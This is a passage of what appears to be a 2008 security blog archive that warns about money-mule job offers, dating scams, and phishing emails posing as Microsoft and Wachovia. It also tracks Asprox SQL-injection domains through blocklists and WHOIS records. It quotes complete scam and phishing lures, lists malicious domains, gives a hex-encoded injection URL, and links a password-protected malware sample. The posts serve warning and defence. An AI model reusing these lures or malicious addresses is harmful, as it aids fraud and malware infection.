family, or just make some extra money.
Be debt free fast making an additional $4,000-12,000 A MONTH!

WRITE US AND APPLY NOW: lvelectronicsinc@aol.com


Fake job offer: ias-jobs.org

One of a series of fake job offers that are doing the rounds, this time promoting a company called IAG ("Internet Auction Service"). It's most likely a money mule scam (i.e. money laundering), or package reshipping (handling stolen goods) or something similar. Avoid.



Subject: Current Vacancy at IAG

Internet Auction Service provides business support, retail distribution, franchise
operations,
direct sales, and a variety of auction as well as accounting and billing services.

We are currently recruiting for the positions of Virtual Office Assistants in the
United
Kingdom, part-time and full-time available. The positions focus on providing
administrative
assistance in online sales.

Part-time and full-time positions available:

Part-time: 3 hours per day during either one of these shifts:
9:00am-12:00pm 11:00am-2:00pm 12:00pm-3:00pm 2:00pm-5:00pm

Full Time: 6 hours per day during either one of these shifts:
9:00am-3:00pm 11:00am-5:00pm

Salary:

Part-time: 1,100GBP/month plus commission
Full-time: 2,200GBP/month plus commission

Professional Qualities:
- Customer focused decision maker
- Demonstrates a high level of personal accountability
- Thinks about the team first over personal agendas
- Learning adaptive
- Process driven

Basic Requirements for Virtual Office Assistant:
- Internet Access
- Microsoft Office
- Basic Accounting skills

If you are interested in this position please send us an email to
Jennifer.Edwards@ias-jobs.org
expressing your interest and we will forward you the detailed job description and
the agreement.

Best regards,
IAS Team



Unusually, the domain ias-jobs.org has been registered for these purposes. www.ias-jobs.org is hosted on 89.218.205.90 in Kazakhstan (again). Mail is handled by 12.192.82.225 in the US which is unusual. Nameservers are ns1.eurogolden.net (194.150.120.47) and ns2.eurogolden.net (62.157.74.89) which all tie into this scam. utl-jobs.com and korkdevelopers.com can also be tied into this.

As a general rule, you should always avoid job offers from companies that you cannot verify exist in real life.

Asprox: lang42.ru

Another Asprox SQL injection domain to block / check for is lang42.ru. The following domains have been active in the past 24 hours:
  • 53refer.ru
  • chk06.ru
  • driver95.ru
  • errghr.ru
  • lang42.ru
  • netcfg9.ru
  • sitevgb.ru
  • vrelel.ru
As I've said before, completely blocking access to .ru domains for most businesses would be a huge problem. Most .ru sites are in Russian, and if you don't use Russian in your business they you can probably live without them.

Wednesday, 15 October 2008

Asprox: new domains

After being stable for some time, the Asprox SQL injection hacks are now redirecting through a new bunch of .ru domains.
  • 30area.ru
  • 4log-in.ru
  • 53refer.ru
  • chk06.ru
  • driver95.ru
  • errghr.ru
  • netcfg9.ru
  • sitevgb.ru
  • vrelel.ru
WHOIS details are:

domain: ERRGHR.RU
type: CORPORATE
nserver: ns2.errghr.ru. 68.6.180.109
nserver: ns3.errghr.ru. 68.12.194.192
nserver: ns1.errghr.ru. 199.126.149.144
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 772 7727727
fax-no: +7 772 7727727
e-mail: retyi111@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.10.09
paid-till: 2009.10.09
source: TC-RIPN

retyi111@yahoo.com has been used before for these domains and various other nasties. As usual, block these domains and/or check your logs for them.

Tuesday, 14 October 2008

What the heck is Win32/Puloagem.B?

I've had a few CA-Vet alerts for Win32/Puloagem.B recently, with pretty sparse information on what Puloagem actually is. If you're being plagued with this, then it's worth knowing that this is basically just a variant of Zlob and it's a variety of fake anti-virus software. In our case, the executable was named winrar.exe.

VirusTotal has a good list of aliases, so if you're struggling with it then you can use some of the other names as references.

"Habitats Property and Service Inc." fake employement offer


Another bogus employment offer, this time from "Habitats Property and Service Inc", but there appears to be no such firm.. although there are plenty of legitimate companies with similar names who are nothing to do with this. It is most likely a money mule scam or package reshipping, or something similar. Avoid.

Subject: Real Estate company is looking for employees. You was selected.

JOB OFFER FROM: Habitats Property and Service Inc.

Big international company is urgently looking for permanent representatives within the whole territory of the United Kingdom. We need people at the age of 21 to 70 for rather easy work on processing of the incoming orders and performancing of simple management duties.

You don’t need to be a specialized professional or to have special training. We also do not require the working experience in this field; all you need for this job are:

* ability to accurately follow the instructions on the solving the required tasks
* be a confident computer user
* ability to work with MS Word
* ability to work with MS Excel
* have permanent Internet access

This job suits students, mothers, pensioners and people who are looking for the part-time job perfectly well. You need only 2-3 spare hours during the day to fulfill your working duties.

All the candidates will be checked and selected on the competitive basis. To submit your application, please, send us your resume/CV to the following address:

cv08.habitats@googlemail.com

Your request will be considered within 24-48 hours.

Originating IP in this case was 217.15.186.77 in Kazakhstan.

Friday, 10 October 2008

FTC: Bank Failures, Mergers and Takeovers: A "Phish-erman's Special"

A timely warning from the FTC on the threat of criminals using the worldwide financial crisis to obtain banking details.. although as seen recently the payload could also be a trojan rather than a phishing attempt.

The FTC say:
If the recent changes in the financial marketplace have you confused, you’re not alone. The financial institution where you did business last week may have a new name today, and your checks and statements may come with a new look tomorrow. A new lender may have acquired your mortgage, and you could be mailing your payments to a new servicer. Procedures for the banking you do online also may have changed. According to the Federal Trade Commission (FTC), the nation’s consumer protection agency, the upheaval in the financial marketplace may spur scam artists to phish for your personal information.
They then go on to offer some excellent tips and examples of what to look out for. As I said before, it's worth warning any end-users you support of this risk because it would be relatively trivial to come up with a scam that looks very convincing indeed, and including a reference to the FTC warning might get at least some of them taking the threat seriously.

Thursday, 9 October 2008

securityassurance@microsoft.com - "Security Update for OS Microsoft Windows"

A malicious EXE file is doing the rounds, pretending to be an update from Microsoft and including some social engineering such as a fake PGP signature. The payload is an executable called KB960312.exe. Detection rates are poor, but it's clearly some hideous piece of malware that you really don't want anywhere near your PC.




Subject: Security Update for OS Microsoft Windows
From: "Microsoft Official Update Center"

Dear Microsoft Customer,

Please notice that Microsoft company has recently issued a Security Update for OS
Microsoft Windows. The update applies to the following OS versions: Microsoft
Windows 98, Microsoft Windows 2000, Microsoft Windows Millenium, Microsoft Windows
XP, Microsoft Windows Vista.

Please notice, that present update applies to high-priority updates category. In
order to help protect your computer against security threats and performance
problems, we strongly recommend you to install this update.

Since public distribution of this Update through the official website
http://www.microsoft.com would have result in efficient creation of a malicious
software, we made a decision to issue an experimental private version of an update
for all Microsoft Windows OS users.

As your computer is set to receive notifications when new updates are available, you
have received this notice.

In order to start the update, please follow the step-by-step instruction:
1. Run the file, that you have received along with this message.
2. Carefully follow all the instructions you see on the screen.

If nothing changes after you have run the file, probably in the settings of your OS
you have an indication to run all the updates at a background routine. In that case,
at this point the upgrade of your OS will be finished.

We apologize for any inconvenience this back order may be causing you.


Thank you,

Steve Lipner
Director of Security Assurance
Microsoft Corp.


-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

3L0SDPQYESHKTVB7P898LE266163YL9LZQ6AU3LYK9JFM85HDX4S5FG0PEUY5HXP0
31Q8WAOREI4H0A7OF4UDTOG8HAXPAZMV91DI6B8XJEQ0636ND3XAWTCOOSNLIGHUN
ZSDHKKLZ099I6Y03BO91DGUTQMMFT0CWMCZQ4G0R0EYMNN199IEG0PKA6CE3ZPAB6
EJ4UN52NIIB4VF78224S7BCNFH3NP9V91T66QV0RKA2KOG0RA0EUM5VY17P41G016
I2YU34EL9XJQGS7C5GMDU4FJUIC3M3ZIAU6==
-----END PGP SIGNATURE-----




Update: KB231660.exe has also been spotted with a different PGP signature, although securityassurance@microsoft.com remains the same. Also KB986008.exe, KB415282.exe, KB985274.exe, KB166277.exe .. probably a load more will be sent out over the next few hours.

Update 2: This has now been picked up by the folks at the ISC.

Citigroup/Wachovia "Security Certificates" trojan

These fake "security certificates" have been around for a while, but it has taken a little time for the Bad Guys to leverage the recent worldwide banking crisis. Expect to see a LOT more of these as more banks struggle or are taken over.

WACHOVIA CORPORATION NOTICE.

Citigroup announced a buyout of Wachovia brokered by the FDIC moments ago.
All Wachovia bank locations will be in the Citigroup merger to prevent failure of Wachovia.
The Citigroup/Wachovia would focus on upgrading banks' security certificates.
All Wachovia customers must fill the forms and complete installation of new Citigroup Standard digital signatures during 48 hours.
Please follow the installation steps below:

Read more here>>

Sincerely, Sophie Burkett.
2008 Wachovia Corporation.
All rights reserved.

The link goes to the insanely named domain commercial [dot] wachovia [dot] online [dot] financial [dot] service [dot] onlineupdate.iawyvy9gcv.bankonline.doexte.gbiexsse.com which is hosted on a fast-flux botnet. The target executable is InstallationPackWachovia.exe located in the root directory which triggers just a few heuristic scanners or generic detections according to VirusTotal.


If you work in IT in any kind of organisation, it is worth sending out a warning to end users to ensure that they are aware of these emails, either at work or at home. The current batch are not particularly credible, but the Bad Guys will probably keep working on their social engineering skills.

Fake "VM-Soft" job offer

VM-SOFT (www.vm-soft.com.ua) is a wholly legitimate Ukranian software developer, whose corporate identity is being used by a third party to perpetrate an apparent Money Mule scam, in an approach almost identical to this earlier fake email for another Ukranian company.

The email copies the name of the director, Viktor Marchenko, and even uses a very similar Gmail address (see the genuine contact page for the real one).


Hello Sir/Madam.


I Viktor Marchenko, I introduce VM-Soft specializes in innovative IT solutions and
complex software projects development.

My company based in Ukraine. We've earned ourselves a reputation of a reliable and
trustworthy partner working successfully with a number of West European companies
and providing them with reliable software development services in financial and
media sectors. Unfortunately we are currently facing some difficulties with
receiving payments for our services. It usually takes us 10-30 days to receive a
payment and clearing from your country and such delays are harmful to our business.
We do not have so much time to accept every wire transfer.


That's why we are currently looking for partners in your country to help us accept
and process these payments faster. If you are looking for a chance to make an
additional profit you can become our representative in your country. As our
representative you will receive 8% of every deal we conduct. Your job will be
accepting funds in the form of wire transfers and forwarding them to us. It is not a
full-time job, but rather a very convenient and fast way to receive additional
income. We also consider opening an office in your country in the nearest future and
you will then have certain privileges should you decide to apply for a full-time
job. Please if you are interested in transacting business with us we will be very
glad.


Please contact me for more information via email: offer.job.vmsoft.ua@gmail.com

and send us the following information about yourself:

Your Full Name as it appears on your resume.
Education.
Your Contact Address.
Telephone/Fax number.
Your present Occupation and Position currently held.
Your Age

Please respond and we will provide you with additional details on how you can become
our representative. Joining us and starting business today will cost you nothing and
you will be able to earn a bit of extra money fast and easy. Should you have any
questions, please feel free to contact us with all your questions.

Sincerely,
Viktor Marchenko ,
VM-Soft



If you're not familiar with this type of scam, then basically it amounts to laundering stolen money.

One important tip usually is that legitimate companies tend not to use free email addresses, but in this case the genuine VM-SOFT does, instead of using its own vm-soft.com.ua domain which is not so helpful.

Increasingly, the scammers use names of genuine companies and even genuine directors. They may register domain names that look confusingly similar to the real thing, so sometimes the only concrete thing that you have to go on is common sense: if it looks too good to be true, then it probably isn't true.

Dating scams, onlineflh.com and 79.135.167.*

I have covered this particular group of dating scam sites before, but this time there's a slight shift in the way that it works. In this case, the parenthesis-laded email looks something like:

hey^) how are you?) do you have a girlfriend?)... i have not boyfriend(( I very
want to meet real men...which will know woman's need ...like in a cinema ... you
know))))lets chat!) i am pretty girl)) I have a lot of time for meetings and if you
have any ideas how to spend it with me... just email me back at
CAROLINE@onlineflh.com and i will reply back with some nice ;) photos with me
...and maybe, you will want to write me again))) CAROLINE@onlineflh.com

Perhaps "Caroline" is trying to data a LISP programmer? There's no website for onlineflh.com, but mail is handled by 79.135.167.51 which is the same as before.. although now the only two websites on that server are Ammae.com and Amnocx.com.

In these circumstances, a tool like Robtex can be useful. It turns out that 79.135.167.51 is a infrastructure server for a number of domains. The IP address noted as belonging to a ROKSO listed spammer, most likely some affiliate of the Russian Business Network (RBN).

Supported domains are:
  • alllam.com
  • cardrealc.com
  • ezshl.com
  • famplayfit.cn
  • firstlam.com
  • flasheon.com
  • gosfordw.com
  • llcam.com
  • morerd.com
  • onlineflh.com
  • onlineshl.com
  • planetflh.com
  • rdplanet.com
  • towadapointhalf.cn
  • virtuellmal.com
The whole 79.135.167.* block is a complete sewer of fake antivirus, dating, medication and codec sites. The netblock is registered to "TTNet Autonomous System Turk Telekom A S Aydinlikevler ANKARA 06103 TURKEY", but most likely under the control of the RBN. There's an interesting writeup about this netblock here.

The Spamhaus DROP list goes further and lists the entire 79.135.160.0/19 block (79.135.160.0 - 79.135.191.255) as being rogue. That's probably overkill as there do seem to be some legitimate (mostly Turkish) websites hosted in that range.

These were more fun when they had a picture of a pretty girl attached.

Monday, 6 October 2008

Asprox: deryv.ru still active

The Asprox botnet is still active but has been remarkable stable with no new domains in the past week, and 88% of the traffic going to deryv.ru.

  • ctiry.ru (3%)
  • deryv.ru (88%)
  • mentoe.ru (4%)
  • mheop.ru (3%)
  • pormce.ru (2%)

Consistently, the malware code is encrypted with eval(function(p,a,c,k,e,d) presumably to avoid detection by anti-virus software. So, if you only check your logs for / block ONE Asprox domain, then deryv.ru seems to be the one to look at.

Monday, 29 September 2008

Nokia's first touchscreen phone....?

There are plenty of rumours that Nokia will announce their "first" touchscreen phone sometime this week.. except that it won't be their first touchscreen phone. Here's a look at previous Nokia touchscreen devices which have mostly been forgotten.

Asprox: ctiry.ru, deryv.ru, mentoe.ru, mheop.ru, pormce.ru and xenbv.ru

Another bunch of Asprox domains that have been active over the past few days are listed below. As usual, block these or check your logs for activity.

  • ctiry.ru
  • deryv.ru
  • mentoe.ru
  • mheop.ru
  • pormce.ru
  • xenbv.ru

Thursday, 25 September 2008

Asprox: "eval(function(p,a,c,k,e,r)"

There has been a slight shift in tactics by the Asprox gang in their SQL Injection Attacks in that they are now using a packer on their javascript. This doesn't seem to be for obfuscation reasons, as the script is relatively easy to decode. Presumably it's a way to get around virus and link scanners. (Click the image below for an example)

You can decode it easily enough by adding eval=alert; to the start of the script (follow the instructions here), but never mess around with malware scripts on a vulnerable production system because it is very easy to get infected.

mnicbre.ru and vtg43.ru seem to be two active domains, although perhaps check for all the ones on this list to be safe.

Packing tools are an easy way to avoid detection.. at least temporarily. But given the prevalence
of Javascript-based malware and the ever-increasing availability of bandwidth, Javascript packing is becoming an increasingly bad practice. There have been a couple of high-profile cases where a packing tool has effectively been blacklisted by anti-virus products (here and here), so perhaps if you use Javascript extensive and use a packing tool you might want to reconsider how you deploy Javascript on your site.

Wednesday, 24 September 2008

Asprox: h3x.info

Briefly popping up on the Asprox SQL Injection radar yesterday was h3x.info, specifically a call to h3x.info/index.php [dangerous site, do not visit].

h3x.info doesn't fit the normal pattern, perhaps it has been rotated in as a test. What's certain is that this is a malware distribution site.. and a pretty scary one at that.

Let's look at the domain details first of all. As you might expect, they're mostly bogus:

Domain ID
D23859712-LRMS
Domain Name
H3X.INFO
Created On
19-Feb-2008 22:04:56 UTC
Last Updated On
27-Aug-2008 12:38:06 UTC
Expiration Date
19-Feb-2009 22:04:56 UTC
Sponsoring Registrar
Registrar Company, INC (R315-LRMS)
Status
OK
Registrant ID
DI_7764637
Registrant Name
Alex
Registrant Organization
Vteam
Registrant Street1
vol. str. 221-122, 12
Registrant Street2

Registrant Street3

Registrant City
Novie
Registrant State/Province
Aveiro
Registrant Postal Code
19923
Registrant Country
PT
Registrant Phone
+12.56231321
Registrant Phone Ext.

Registrant FAX

Registrant FAX Ext.

Registrant Email
cy@bk.ru

[..snip..]

Name Server
ns1.mbhost.ru
Name Server
ns2.mbhost.ru
The domain itself is on 80.90.114.13 which appears to be a general purpose server belonging to Smartlogic Ltd in Moscow. There's no evidence to connect Smartlogic to this site, other than it belongs to a customer.. overall they seem to be a pretty clean outfit.

Visiting the top level of the h3x.info site (or the index.php page) reveals a very impressive bit of obfuscated scripting (a copy is here - h3x-info.zip - ZIP password is virus). There are some recognisable references to Outlook Express, Snapshot (probably MS08-041), Apple QuickTime (take your pick), plus an infected PDF (from hxxp:||h3x.info|cache|doc.pdf) variously identified as Exploit.HTML.Agent.AO [BitDefender] and Mal/JSShell-B [Sophos] (full VirusTotal report here) but otherwise detection rates are very poor.

Looking at the WHOIS history, it's quite possible that the h3x.info domain has been hijacked, so perhaps it will be cleaned up in the future. At the moment it does seem to be an interesting repository of malware if you're a researcher.

It was only active for a short while at about 1000 UTC (1100 BST, 1200 CET) on 23rd September before reverting to the same .ru domains that have been active for a few days.


Tuesday, 23 September 2008

T-Mobile G1

It's kind of hard to tell if the T-Mobile G1 is the next big thing or just some sort of damp squib. It may not look as impressive as the iPhone on the top, but underneath the G1's Android operating system looks promising.

Oddly enough, it got me thinking about how I use my own phone.. and I tend to use web access more than anything else, but make only a couple of phone calls on it a week, sometimes I will listed to music or snap a photograph. I think I tried video calling once. So perhaps this G1 thingie is actually more in line with what a lot of sad geeky people like me actually want.

Anyway, this comes out in October in the US, November in the UK and early next year for other T-Mobile customers. Some more pictures are here.

Thursday, 18 September 2008

Asprox: mnbenio.ru

mnbenio.ru is a new Asprox SQL injection domain that has been active in the past 24 hours, the following four domains are the most active:

  • mnbenio.ru
  • mnicbre.ru
  • pkseio.ru
  • vtg43.ru
It does seem that the SQL injection attacks are becoming less widespread, probably partly because SQL servers are being hardened, but some vulnerable SQL servers have remained untouched by the latest round of attacks. Possibly the SQL injection gangs are concentrating on bigger fish? Like the recent attack on BusinessWeek.com perhaps?

Wednesday, 17 September 2008

Asprox: mnicbre.ru, pkseio.ru and vtg43.ru

The domains used in the Asprox SQL Injection attacks have been stable for a few days now, but yesterday some new .ru domains appeared: mnicbre.ru, pkseio.ru and vtg43.ru. The domains are registered through NAUNET again with the following registation details:

domain: MNICBRE.RU
type: CORPORATE
nserver: ns2.mnicbre.ru. 75.181.3.122
nserver: ns3.mnicbre.ru. 68.197.137.239
nserver: ns1.mnicbre.ru. 76.240.151.177
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 772 7727091
fax-no: +7 772 7727091
e-mail: retyi1111@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.09.16
paid-till: 2009.09.16
source: TC-RIPN
The following domains have been active over the past 24 hours. Block these or check your logs for them (new ones are in bold):
  • 22net.ru
  • 64asp.ru
  • 92prt.ru
  • acr34.ru
  • asl39.ru
  • fst9.ru
  • mnicbre.ru
  • pkseio.ru
  • sel92.ru
  • vtg43.ru

Saturday, 13 September 2008

Doug Stanhope

I first stumbled across US stand-up comic Doug Stanhope [link probably NSFW] some years ago and was in equal parts horrified and amused by his work. By chance, I found out that he was in the UK (at the Leicester Square Theatre) so Mrs Dynamoo and myself booked some tickets to go and see him live.

You have to understand that Stanhope is pretty much the definition of "edgy". He seems to have no taboos and no fear.. as long as he's had some beer. Understand that some of his topics include suicide, gynaecology, death, drug abuse, overpopulation, abortion and Sarah Palin. Sometimes combined (don't click if you are offended by.. well, offensive stuff).

Even people who aren't easily offended are likely to be offended by something he will say. But on the other hand, perhaps some of those observations on the human condition are more profound than you would think.

So, Stanhope was on form and really, really funny. And yes.. there were several times when I thought "no.. he can't be saying that!". I could go into details, but if you like this kind of thing then it would spoil the surprise... I think it's the first time I've ever had to watch a gig like this from between my fingers.

Anyway, Stanhope is in London and Manchester for most of September, and then back in the US doing a tour for October and November (itinerary here). Or you could purvey yourself one of his fine DVDs on Amazon.

Thursday, 11 September 2008

Dating scams

Dating scams are usually a variant of the advanced fee fraud - some pretty girl (probably some ugly bloke in reality) sends you some random photos and explains that they want to move to your country and move in with you.. but can they have some money first? The basic operation of these scams is described here. To make it look more credible, sometimes fake dating sites are set up to give the whole thing an air of legitimacy.

This current batch of fake sites is being advertised with an email similar to the following:

i need you

i am Nice Girl good looking girl who is looking to chat with you.
e-mail me back at UcWkS@lam2you.com

i will reply back with some really nice pictures.

The domain lam2you.com has a corresponding web site on 79.135.167.51 calling itself "Online sexiest dating site". As it happens, there are a whole bunch of other domains on the same server, also describing themselves as "Online sexiest dating site", all best avoided.

  • Amnocx.com
  • Anandaperumal.com
  • Bardline.com
  • Benrd.com
  • Bestdre.info
  • Cardrealc.com
  • Centralrd.com
  • Cowarddean.com
  • Direktmal.com
  • Dracingsite.info
  • Dracingworld.info
  • Draic.info
  • Dreguide.info
  • Drkin.info
  • Drmarksite.info
  • Drmarkworld.info
  • Drseusssite.info
  • Equipyard.com
  • Evram.info
  • Ezelive.info
  • Ezrdhome.com
  • Firstlam.com
  • Fordhx.com
  • Frcis.info
  • Freegbl.info
  • Freeksite.info
  • Freeldp.info
  • Friguide.info
  • Frutis-basket.info
  • Gardevin.com
  • Gbbed.info
  • Gbizc.info
  • Gbladx.info
  • Gblhome.info
  • Gblwizard.info
  • Gbowrxx.info
  • Glocentral.info
  • Gloplanet.info
  • Gobobrom.com
  • Gocarthq.com
  • Gocartutah.com
  • Goldpug.info
  • Gosfordw.com
  • Greatrom.com
  • Guyvr.info
  • Hardjam.com
  • Hote2youx.info
  • Hyperlam.com
  • Imalonline.com
  • Justgbl.info
  • Justrd.com
  • Justvre.info
  • Ldphome.info
  • Ldpwizard.info
  • Lesdv.com
  • Lesjr.com
  • Letsgocart.com
  • Lgbidxx.info
  • Maldirekt.com
  • Malkostenlos.com
  • Malplatz.com
  • Malprojekt.com
  • Malwelt.com
  • Malzentrale.com
  • Mediagocart.com
  • Medmallist.com
  • Meinmal.com
  • Menziesmalvern.com
  • Moonboardm.com
  • Morerd.com
  • Mygbl.info
  • Nitgbx.info
  • Nvromx.info
  • Officialgbl.info
  • Officialldp.info
  • Officialrd.com
  • Oldpee.info
  • Onlinegbl.info
  • Ovrom.info
  • Pacanimal.com
  • Phillymedicalmal.com
  • Qualitaetmal.com
  • Razales.com
  • Rd2you.com
  • Rdnation.com
  • Rdplanet.com
  • Saravanaperumal.com
  • Searchesrom.com
  • Shemalglobal.com
  • Supergbl.info
  • Superldp.info
  • Superrd.com
  • Superromics.com
  • Tomalonline.com
  • Topeguidex.info
  • Virtualgbl.info
  • Virtualglo.info
  • Virtualldp.info
  • Virtuellmal.com
  • Vrehome.info
  • Warmalonline.com
  • Wildpin.info
  • Wirelesamerica.com
  • Wizardrd.com
  • Worldpivot.info
  • Worldplayservices.info
  • Yourfr.info
  • Yourgbl.info
  • Yourldp.info
  • Capvr.info
  • Davidre.info
  • Virtualvre.info
  • Vreproject.info
  • Vrewizard.info
One thing of note is that the name servers used here are ns1.droreal.com and ns2.droreal.com which appears to be a domain name used to support other dating scam sites.

Asprox: 22net.ru, 4net9.ru, 64asp.ru, 92prt.ru and fst9.ru

These are the domains active in the Asprox SQL Injection attack in the past 24 hours, new ones are in bold. Block these and/or check your logs for them.

  • 22net.ru
  • 4net9.ru
  • 51com.ru
  • 64asp.ru
  • 92prt.ru
  • acr34.ru
  • fst9.ru
  • sel92.ru

Wednesday, 10 September 2008

SpamCop phish

Some people will phish for anything - in this case they are trying to get access to SpamCop accounts. Go figure. Reply to address is 2020sarah@live.com.




Subject: UPDATE YOUR ACCOUNT / SPAMCOP.NET
From: "Admin@spamcop.net"
Date: Wed, September 10, 2008 4:54 pm
Cc: recipient list not shown:;
Priority: Normal

This is a WebNews Email Account Update
Please see the bottom of this mailing on this information.
-----------------------------------------------------------
SPAMCOP.NET WEBMAIL
INTERNET SERVICE WEBSITE WISH TO INFORM YOU THAT WE HAVE
SOME PROBLEMS ABOUT EACH CUSTOMER ACCOUNT EMAIL. DUE TO
ERROR CODE 334409.

WE DISCOVERD THAT IN FEW DAYS FROM NOW EACH CUSTOMER WILL
NOT BE ABLE TO ACCESS HIS OR HER EMAIL ACCOUNT. IN THAT
REGARD,YOU ARE REQUIRED TO SEND YOUR EMAIL ADDRESS AND
PASSWORD FOR A NEW ACCOUNT UPDATE.

YOU ARE ADVISED TO IMMEDIATELY SEND US THE REQUIRED
INFORMATION SO AS TO ENABLE US IMMEDIATELY UPDATE YOUR
ACCOUNT.

Note:You have to understand that the reason why we are not
sending this message from our own private account.This is
due to some technical problem we are having right now.

BELOW THE INFORMATION RQRUIRED FOR ACCOUT UPDATE

1)Full Email Address:
2)password:
3)date of birth:

Thanks for your understanding.

SPAMCOP.NET WEBMAIL INTERNET SERVICE


PestPatrol: SillyDl FFL in wuauclt.exe

It looks like CA PestPatrol might have a false positive, detecting SillyDl FFL in C:\windows\system32\wuauclt.exe. This is a component of Windows Update, and in the case of the false positive it is a 124,184 byte file with an internal version number of 5.8.0.2469.

PestPatrol does not appear to be trying to delete the file, it is merely blocking access to it. Updating your Windows Update components should clear the problem. CA usually fix these false positives in a day or so.

The current signature version is 2008.9.9.15. Note that the PestPatrol engine is used in some other products, not all of which have the CA name on them.

Asprox: net83.ru, acr34.ru, asl39.ru and net83.ru

Another bunch of very fresh Asprox domains being used in the Asprox SQL Injection attack, registered at Naunet to email address retyi111@yahoo.com. Check your logs or block access to these sites.

  • 51com.ru
  • acr34.ru
  • asl39.ru
  • net83.ru

Tuesday, 9 September 2008

SQL Injection: ave2.cn / %61%76%65%32%2E%63%6E

This SQL Injection attack seems to be aimed at Chinese language sites. The code injected points to http://%61%76%65%32%2E%63%6E which is trivially encoded and is a reference to ave2.cn hosted on 219.129.239.251.

ave2.cn then calls asp-18.cn, asp-12.cn and www.hxg006.cn (all hosted on 219.129.239.251).

Between them, these sites carry a VERY wide variety of exploits, including MS06-014, GLIEDown (for the Baofeng Storm StormPlayer), MS snpvw.Snapshot viewer (Outlook Express), DPClient.Vod (Xunlei Thunder DapPlayer), Flash Player and RealPlayer. There are possibly other exploits mixed in, so I would regard ave2.cn as being VERY dangerous.

Robtex reports the following domains on 219.129.239.251, all of which are probably worth avoiding:

  • hs7yue.cn
  • hxg008.cn
  • jzm015.cn
  • doups.cn
  • hxg008.cn
  • jzm013.cn
  • jzm014.cn
  • jzm015.cn
  • qingfeng01.cn

Monday, 8 September 2008

Asprox: 64do.com

Possibly the final Asprox domain on the day in 64do.com - add this to your block or scan list.

Asprox: "aspx" domains

Keep an eye out for these following Asprox domains, all recently registered to the email address druid00091@aol.com. Block them or scan your logs for them.

  • 24aspx.com
  • 2aspx.net
  • 6aspx.com
  • 9aspx.net
  • aspx46.com
These domains follow the same pattern as this one and this one.

Asprox: 19ssl.net

Another "druid00091@aol.com" domain (following on from this one and this one) , this type 19ssl.net, which is being actively used as part of the SQL injection attacks. The top level of this domain also has a copy of the (presumably legitimate) nescodirect.com site (this behavious is noted elsewhere).

Domain name: 19ssl.net

Registrant Contact:
City22 llc
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

Administrative Contact:
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

Technical Contact:
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

Billing Contact:
Alex Williamos druid00091@aol.com
+1.8827721124 fax: +1.8827721124
321113 po box
New York NY 12131
us

DNS:
ns1.19ssl.net
ns2.19ssl.net
ns3.19ssl.net